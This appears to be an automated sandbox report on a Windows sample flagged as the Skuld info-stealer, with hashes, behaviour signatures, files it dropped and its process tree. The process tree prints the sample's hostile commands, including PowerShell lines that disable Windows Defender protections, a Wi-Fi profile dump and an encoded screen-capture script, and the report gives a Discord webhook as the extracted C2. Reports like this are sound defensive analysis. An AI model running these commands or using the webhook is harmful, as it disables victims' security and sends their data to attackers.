Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250313-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22/03/2025, 14:38

General

  • Target

    2025-03-22_5a5f9a96c3c41e82d56a051edb36f82b_frostygoop_knight_luca-stealer_poet-rat_sliver_snatch.exe

  • Size

    10.3MB

  • MD5

    5a5f9a96c3c41e82d56a051edb36f82b

  • SHA1

    8d6f39f71037917fc7c15241f7131b9901fb7b54

  • SHA256

    ef629b3a44d02b2508b720cb5de2a2fbc54a59a63449e328dd403bfbed07b4ed

  • SHA512

    46fd1e91a6a06f34327720ef9e6a76ef2ee0e061ec204d5bac790594ff66987a4ec5e5f4b3d00da7159b2fb3f8cead858cc51debd706cbdcf21222d0b48fe596

  • SSDEEP

    98304:1yRLY7s83mbP5+zgpsA6d+XiT/CM/brSEZEGQT:1193IP5+oC+XiT/Ck8GQT

Malware Config

Extracted

Family

skuld

C2

https://discord.com/api/webhooks/1350543866280939550/SY52rRqXQT0N0wIPigi43bkoctLXTSNakcRfTDLaY88qjnjY4ZJaYUkqUKG9Y4zK8bET

Signatures

  • Skuld family
  • Skuld stealer

    An info stealer written in Go lang.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Views/modifies file attributes 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-22_5a5f9a96c3c41e82d56a051edb36f82b_frostygoop_knight_luca-stealer_poet-rat_sliver_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-22_5a5f9a96c3c41e82d56a051edb36f82b_frostygoop_knight_luca-stealer_poet-rat_sliver_snatch.exe"
    1⤵
    • Drops file in Drivers directory
    • Adds Run key to start application
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2016
    • C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\AppData\Local\Temp\2025-03-22_5a5f9a96c3c41e82d56a051edb36f82b_frostygoop_knight_luca-stealer_poet-rat_sliver_snatch.exe
      2⤵
      • Views/modifies file attributes
      PID:5124
    • C:\Windows\System32\Wbem\wmic.exe
      wmic os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:5720
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\2025-03-22_5a5f9a96c3c41e82d56a051edb36f82b_frostygoop_knight_luca-stealer_poet-rat_sliver_snatch.exe
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2748
    • C:\Windows\system32\attrib.exe
      attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
      2⤵
      • Views/modifies file attributes
      PID:3196
    • C:\Windows\System32\Wbem\wmic.exe
      wmic cpu get Name
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1872
    • C:\Windows\System32\Wbem\wmic.exe
      wmic path win32_VideoController get name
      2⤵
      • Detects videocard installed
      PID:4548
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:4684
    • C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get UUID
      2⤵
        PID:4292
      • C:\Windows\system32\attrib.exe
        attrib -r C:\Windows\System32\drivers\etc\hosts
        2⤵
        • Drops file in Drivers directory
        • Views/modifies file attributes
        PID:3068
      • C:\Windows\system32\attrib.exe
        attrib +r C:\Windows\System32\drivers\etc\hosts
        2⤵
        • Drops file in Drivers directory
        • Views/modifies file attributes
        PID:4792
      • C:\Windows\system32\netsh.exe
        netsh wlan show profiles
        2⤵
        • Event Triggered Execution: Netsh Helper DLL
        • System Network Configuration Discovery: Wi-Fi Discovery
        PID:1900
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1192
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lu4ueud4\lu4ueud4.cmdline"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3920
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6745.tmp" "c:\Users\Admin\AppData\Local\Temp\lu4ueud4\CSC41D961AE27324C74A1427CED2A10FDA5.TMP"
            4⤵
              PID:5356

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        029fbf628b046653ab7ff10b31deeeb2

        SHA1

        93c2cb1905c8f5e71f5ea97a1e8a8c891eae077c

        SHA256

        85f6b0971e94daf9fd4e39413824f162851a9f5ce7f989bd92c903a4dbcbef26

        SHA512

        d4e3626dba2572bd1e53446b384962f955cc0c7e56a72cacf50a845d74714ec1020bcb0fdcc50636a1dfd4f08dc34143dbb5638dd90180df6aa31dab9228c98c

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        944B

        MD5

        54522d22658e4f8f87ecb947b71b8feb

        SHA1

        6a6144bdf9c445099f52211b6122a2ecf72b77e9

        SHA256

        af18fc4864bc2982879aed928c960b6266f372c928f8c9632c5a4eecd64e448a

        SHA512

        55f2c5a455be20dcb4cb93a29e5389e0422237bdd7ac40112fec6f16a36e5e19df50d25d39a6d5acb2d41a96514c7ecd8631ce8e67c4ff04997282f49d947aba

      • C:\Users\Admin\AppData\Local\Temp\RES6745.tmp

        Filesize

        1KB

        MD5

        4d79aefb95969b8b8fcd0261dc65803c

        SHA1

        41775fa4a6864686534a74e4c5557156ac85718d

        SHA256

        69c0fb59bce785b88423c7f6b8e5363bf2d3a7417dbc09d8a903260b19dd50ce

        SHA512

        a7a737c772151b0fbf6e8b0ef0eeee86be56ab7d5a824b3f3e5b35259dce69bb92f7848c4e437d823f26464bed63a4ee137934b3a444bfeef903ab8d78184a55

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lellagq0.3up.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\lu4ueud4\lu4ueud4.dll

        Filesize

        4KB

        MD5

        d62b538d5b0aeeeb97a2effa11169954

        SHA1

        956411e47470eb85bec808461f4b1c0c63fd1aa3

        SHA256

        77a694da4cbf40b2edc18c3532b12c62a26ca3614ef507f826da60990e8d65ea

        SHA512

        df1c9a60feed53b142463bf4317c15eb3058a66feab2e70825ec929f0b4c6e6a15babc27613b01b3ccbf88049a249cd7208480c21861a261ed938317fe49290d

      • C:\Users\Admin\AppData\Local\Temp\rWcaOj0cA1\Display (1).png

        Filesize

        435KB

        MD5

        e021240a199b552b4ba4c7663c22a70a

        SHA1

        62cdb4f7d73f5ae3674024a385a221a46aebac81

        SHA256

        93fed08ad7bc295c991b0a8a4e5ee6a105b6cbc6e61d746a110b93ee4f058ccf

        SHA512

        9d740d9f931c42a8dbc0d7b45c291aca55505370e3bf1ded79859a894ccce1f8f9c6241a991eb3fa3840cb39990f173aae403c00f5bffc3a64341091b3358100

      • C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe

        Filesize

        10.3MB

        MD5

        5a5f9a96c3c41e82d56a051edb36f82b

        SHA1

        8d6f39f71037917fc7c15241f7131b9901fb7b54

        SHA256

        ef629b3a44d02b2508b720cb5de2a2fbc54a59a63449e328dd403bfbed07b4ed

        SHA512

        46fd1e91a6a06f34327720ef9e6a76ef2ee0e061ec204d5bac790594ff66987a4ec5e5f4b3d00da7159b2fb3f8cead858cc51debd706cbdcf21222d0b48fe596

      • C:\Windows\System32\drivers\etc\hosts

        Filesize

        1KB

        MD5

        008fba141529811128b8cd5f52300f6e

        SHA1

        1a350b35d82cb4bd7a924b6840c36a678105f793

        SHA256

        ab0e454a786ef19a3ae1337f10f47354ffa9521ea5026e9e11174eca22d86e84

        SHA512

        80189560b6cf180a9c1ecafc90018b48541687f52f5d49b54ca25e040b3264da053e3d4dbb0cd38caaf496e23e516de18f500b333e3cda1fd1b25c6e9632defc

      • \??\c:\Users\Admin\AppData\Local\Temp\lu4ueud4\CSC41D961AE27324C74A1427CED2A10FDA5.TMP

        Filesize

        652B

        MD5

        611138dde0447e6afbae9bed97cb3f2e

        SHA1

        c7e4d8972c86be2c2b07d81e221a57d067953bea

        SHA256

        5b9b75aebdc6a2c0fe87baae3f7fcc825bbe95221cc4072d69f0e1d34a162fde

        SHA512

        dc551e68e75f0c63ca3fe451dab0d7b0b620181f18801c573440aefcc886c5f4448835467c01eef02e56203890aa91a31c9dc231a426ae3fb252ba809917446f

      • \??\c:\Users\Admin\AppData\Local\Temp\lu4ueud4\lu4ueud4.0.cs

        Filesize

        1004B

        MD5

        c76055a0388b713a1eabe16130684dc3

        SHA1

        ee11e84cf41d8a43340f7102e17660072906c402

        SHA256

        8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

        SHA512

        22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

      • \??\c:\Users\Admin\AppData\Local\Temp\lu4ueud4\lu4ueud4.cmdline

        Filesize

        607B

        MD5

        449029bfd522cac6c51487068941481d

        SHA1

        ea441fde931bcea87d2a2985b2ad816fc4192e39

        SHA256

        b2871ccac9d7db3162b5480aaf0e7126fee6c71ce6c733623b79d068be0e0da2

        SHA512

        0ed6803987089075e263d2b4cefda8dcc367952ee6ab9cb4ae0be8897a79398037a18ef1d7e20a92562b667c85a4da2c80f49bc8c0f0dab1bde81ccf783ab9e0

      • memory/1192-60-0x0000022DF2270000-0x0000022DF2278000-memory.dmp

        Filesize

        32KB

      • memory/2748-17-0x00007FFD7B2D0000-0x00007FFD7BD91000-memory.dmp

        Filesize

        10.8MB

      • memory/2748-10-0x000001A173240000-0x000001A173262000-memory.dmp

        Filesize

        136KB

      • memory/2748-15-0x00007FFD7B2D0000-0x00007FFD7BD91000-memory.dmp

        Filesize

        10.8MB

      • memory/2748-3-0x00007FFD7B2D3000-0x00007FFD7B2D5000-memory.dmp

        Filesize

        8KB

      • memory/2748-21-0x00007FFD7B2D0000-0x00007FFD7BD91000-memory.dmp

        Filesize

        10.8MB